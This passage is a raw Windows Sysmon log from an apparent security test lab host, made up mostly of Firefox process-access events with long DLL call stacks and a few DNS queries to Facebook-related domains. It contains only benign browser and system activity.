Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program 
Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971 10341000x800000000000000017591Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:22.944{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla 
Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8 10341000x800000000000000017590Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:22.944{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017589Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:00:22.944{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000017588Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:22.914{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla 
Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14ead42|C:\Program Files\Mozilla Firefox\xul.dll+14c8bb3|C:\Program Files\Mozilla Firefox\xul.dll+16115fd|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561 10341000x800000000000000017587Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:22.913{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla 
Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017586Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:22.913{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000017585Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:22.912{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla 
Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+327dd8a|C:\Program Files\Mozilla Firefox\xul.dll+327d3d4|C:\Program Files\Mozilla Firefox\xul.dll+328bf18|C:\Program Files\Mozilla Firefox\xul.dll+485b8b|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21 22542200x800000000000000017584Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:20.140{59A5CD1D-945A-6005-3305-00000000A301}7052atlas.c10r.facebook.com02a03:2880:f01c:8004:face:b00c:0:8c;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017583Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:20.137{59A5CD1D-945A-6005-3305-00000000A301}7052atlas.c10r.facebook.com0157.240.20.5;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017582Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:20.137{59A5CD1D-945A-6005-3305-00000000A301}7052cx.atdmt.com0type: 5 atlas.c10r.facebook.com;::ffff:157.240.20.5;C:\Program Files\Mozilla Firefox\firefox.exe 
22542200x800000000000000017581Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:19.933{59A5CD1D-8E56-6005-2E00-00000000A301}246435.20.240.157.in-addr.arpa.0type: 12 edge-star-mini-shv-02-frt3.facebook.com;C:\Windows\sysmon64.exe 10341000x800000000000000017580Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:22.214{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017579Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:22.214{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla 
Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000017578Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:22.213{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program 
Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+327dd8a|C:\Program Files\Mozilla Firefox\xul.dll+327d3d4|C:\Program Files\Mozilla Firefox\xul.dll+328bf18|C:\Program Files\Mozilla Firefox\xul.dll+485b8b|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21 10341000x800000000000000017614Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:24.985{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017613Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:24.979{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla 
Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017612Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:24.979{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017611Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:24.969{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017610Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:24.925{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program 
Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017609Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:24.925{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017608Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:24.919{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla 
Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017607Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:24.915{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017606Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:24.914{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017605Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:24.904{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program 
Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017604Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:24.895{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla 